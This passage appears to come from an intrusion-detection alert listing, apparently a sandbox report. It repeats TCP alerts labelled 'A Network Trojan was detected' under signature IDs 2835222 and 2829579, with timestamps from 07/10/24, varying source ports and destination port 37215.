                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.382333
                  SID:2835222
                  Source Port:49318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.770173
                  SID:2835222
                  Source Port:45580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.039541
                  SID:2835222
                  Source Port:56296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.233707
                  SID:2829579
                  Source Port:42924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.741925
                  SID:2829579
                  Source Port:35432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.796387
                  SID:2829579
                  Source Port:46848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423394
                  SID:2835222
                  Source Port:44240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.649894
                  SID:2829579
                  Source Port:40614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948745
                  SID:2829579
                  Source Port:44642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.772141
                  SID:2829579
                  Source Port:58792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.521887
                  SID:2835222
                  Source Port:55514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853796
                  SID:2835222
                  Source Port:55300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.848972
                  SID:2829579
                  Source Port:35342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.975422
                  SID:2829579
                  Source Port:40472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463838
                  SID:2835222
                  Source Port:46236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.748733
                  SID:2835222
                  Source Port:43166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.834804
                  SID:2829579
                  Source Port:52008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.919171
                  SID:2835222
                  Source Port:42770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.803764
                  SID:2835222
                  Source Port:35928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.455887
                  SID:2835222
                  Source Port:45982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095355
                  SID:2829579
                  Source Port:53780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.768994
                  SID:2835222
                  Source Port:60312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.995809
                  SID:2835222
                  Source Port:48986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.493980
                  SID:2829579
                  Source Port:41918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.541811
                  SID:2835222
                  Source Port:42396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.522257
                  SID:2829579
                  Source Port:54088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.858364
                  SID:2829579
                  Source Port:41484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499422
                  SID:2829579
                  Source Port:43086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.376968
                  SID:2829579
                  Source Port:41238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.658896
                  SID:2829579
                  Source Port:37132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872361
                  SID:2835222
                  Source Port:39302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.908970
                  SID:2835222
                  Source Port:58598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.558809
                  SID:2829579
                  Source Port:43426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339943
                  SID:2829579
                  Source Port:45330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.897664
                  SID:2835222
                  Source Port:52522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.487311
                  SID:2835222
                  Source Port:38712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667769
                  SID:2829579
                  Source Port:50038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2829579
                  Source Port:39786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.427653
                  SID:2835222
                  Source Port:37852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164336
                  SID:2835222
                  Source Port:45332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.835894
                  SID:2829579
                  Source Port:35194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.556731
                  SID:2829579
                  Source Port:50262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.396195
                  SID:2835222
                  Source Port:34864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652788
                  SID:2835222
                  Source Port:43376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.476661
                  SID:2835222
                  Source Port:50248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2835222
                  Source Port:40198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2835222
                  Source Port:52512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.349931
                  SID:2835222
                  Source Port:35268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.550517
                  SID:2829579
                  Source Port:49188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.512071
                  SID:2835222
                  Source Port:56408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.102100
                  SID:2835222
                  Source Port:44240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828351
                  SID:2829579
                  Source Port:38666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.931354
                  SID:2835222
                  Source Port:49494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148495
                  SID:2829579
                  Source Port:44656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.189377
                  SID:2829579
                  Source Port:47906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483637
                  SID:2835222
                  Source Port:33684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.569815
                  SID:2835222
                  Source Port:36676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2835222
                  Source Port:36554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.190243
                  SID:2829579
                  Source Port:45828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395697
                  SID:2829579
                  Source Port:60604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.539948
                  SID:2835222
                  Source Port:48146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981356
                  SID:2829579
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.868107
                  SID:2835222
                  Source Port:44944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.077199
                  SID:2835222
                  Source Port:58018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.093525
                  SID:2835222
                  Source Port:48494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2835222
                  Source Port:46770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782504
                  SID:2829579
                  Source Port:38192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.781347
                  SID:2835222
                  Source Port:52232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.826099
                  SID:2829579
                  Source Port:35674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247201
                  SID:2829579
                  Source Port:48194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657885
                  SID:2829579
                  Source Port:56630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148665
                  SID:2835222
                  Source Port:43092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142531
                  SID:2835222
                  Source Port:57390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136584
                  SID:2829579
                  Source Port:50420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598670
                  SID:2829579
                  Source Port:41162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.466176
                  SID:2829579
                  Source Port:48992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.869693
                  SID:2835222
                  Source Port:35620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439576
                  SID:2829579
                  Source Port:60896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.548037
                  SID:2829579
                  Source Port:49520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.883243
                  SID:2829579
                  Source Port:34768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086358
                  SID:2835222
                  Source Port:42832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.515269
                  SID:2829579
                  Source Port:56402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.672822
                  SID:2829579
                  Source Port:50092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629936
                  SID:2835222
                  Source Port:55164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.246855
                  SID:2829579
                  Source Port:47518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2829579
                  Source Port:52400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.164992
                  SID:2835222
                  Source Port:36306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596849
                  SID:2829579
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069950
                  SID:2829579
                  Source Port:57818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.455188
                  SID:2829579
                  Source Port:53824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.772453
                  SID:2835222
                  Source Port:58568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207305
                  SID:2835222
                  Source Port:36316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.184219
                  SID:2835222
                  Source Port:56818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.617783
                  SID:2835222
                  Source Port:33170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.907657
                  SID:2835222
                  Source Port:53210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.684661
                  SID:2829579
                  Source Port:60358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.074634
                  SID:2835222
                  Source Port:36922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.231914
                  SID:2829579
                  Source Port:34384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.901645
                  SID:2829579
                  Source Port:36850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.908493
                  SID:2835222
                  Source Port:59144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356151
                  SID:2835222
                  Source Port:45654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.883377
                  SID:2829579
                  Source Port:40522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.859176
                  SID:2829579
                  Source Port:54084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.454904
                  SID:2829579
                  Source Port:34756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.453359
                  SID:2829579
                  Source Port:45152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.882178
                  SID:2835222
                  Source Port:53982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247201
                  SID:2835222
                  Source Port:54934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196325
                  SID:2829579
                  Source Port:42578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.590272
                  SID:2835222
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.897111
                  SID:2835222
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.874379
                  SID:2829579
                  Source Port:33914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.372745
                  SID:2829579
                  Source Port:40514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.600235
                  SID:2835222
                  Source Port:53144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668166
                  SID:2835222
                  Source Port:53928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2835222
                  Source Port:59254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.193569
                  SID:2835222
                  Source Port:34788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.878882
                  SID:2829579
                  Source Port:35420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.926927
                  SID:2829579
                  Source Port:43734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.631103
                  SID:2835222
                  Source Port:60432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.791726
                  SID:2829579
                  Source Port:52914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630697
                  SID:2835222
                  Source Port:33256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593962
                  SID:2835222
                  Source Port:33044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.906584
                  SID:2829579
                  Source Port:58414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135009
                  SID:2829579
                  Source Port:35722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.196013
                  SID:2829579
                  Source Port:46222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.990905
                  SID:2829579
                  Source Port:40396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.451295
                  SID:2835222
                  Source Port:54832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2835222
                  Source Port:43032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589682
                  SID:2835222
                  Source Port:55200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.104843
                  SID:2829579
                  Source Port:35648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.754547
                  SID:2835222
                  Source Port:49642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.906366
                  SID:2835222
                  Source Port:50502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468333
                  SID:2829579
                  Source Port:37096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.861640
                  SID:2829579
                  Source Port:46846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.494437
                  SID:2835222
                  Source Port:54428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.170023
                  SID:2829579
                  Source Port:59020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.660823
                  SID:2835222
                  Source Port:53180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431217
                  SID:2829579
                  Source Port:48266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933430
                  SID:2829579
                  Source Port:45392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.830052
                  SID:2829579
                  Source Port:50270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376838
                  SID:2835222
                  Source Port:44028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.327532
                  SID:2835222
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.167098
                  SID:2829579
                  Source Port:34884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.880000
                  SID:2829579
                  Source Port:38512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.025929
                  SID:2829579
                  Source Port:53646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.840131
                  SID:2835222
                  Source Port:38858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863531
                  SID:2835222
                  Source Port:45104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.970801
                  SID:2835222
                  Source Port:40778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.931354
                  SID:2829579
                  Source Port:55960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.900584
                  SID:2835222
                  Source Port:44512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.225771
                  SID:2829579
                  Source Port:58544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121645
                  SID:2835222
                  Source Port:44620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.928698
                  SID:2829579
                  Source Port:51578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.477028
                  SID:2835222
                  Source Port:52576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163941
                  SID:2829579
                  Source Port:45902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804179
                  SID:2829579
                  Source Port:45992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.434490
                  SID:2835222
                  Source Port:33540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.638396
                  SID:2829579
                  Source Port:51866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.009687
                  SID:2829579
                  Source Port:41978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824955
                  SID:2835222
                  Source Port:39362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271475
                  SID:2829579
                  Source Port:52398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.512534
                  SID:2829579
                  Source Port:59426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037412
                  SID:2835222
                  Source Port:50476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.851731
                  SID:2835222
                  Source Port:43098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.211631
                  SID:2829579
                  Source Port:59430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2829579
                  Source Port:58352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790655
                  SID:2835222
                  Source Port:50744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526577
                  SID:2835222
                  Source Port:40690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527287
                  SID:2835222
                  Source Port:52750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.330211
                  SID:2835222
                  Source Port:48224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.758279
                  SID:2835222
                  Source Port:41546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.743461
                  SID:2835222
                  Source Port:58264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.859718
                  SID:2835222
                  Source Port:40934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2835222
                  Source Port:45374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.122921
                  SID:2829579
                  Source Port:38604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.983079
                  SID:2835222
                  Source Port:54814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.562580
                  SID:2835222
                  Source Port:45904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.452279
                  SID:2835222
                  Source Port:58244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.392725
                  SID:2835222
                  Source Port:57202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.664230
                  SID:2835222
                  Source Port:55592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839974
                  SID:2835222
                  Source Port:58424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281765
                  SID:2835222
                  Source Port:46114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.632510
                  SID:2835222
                  Source Port:56634
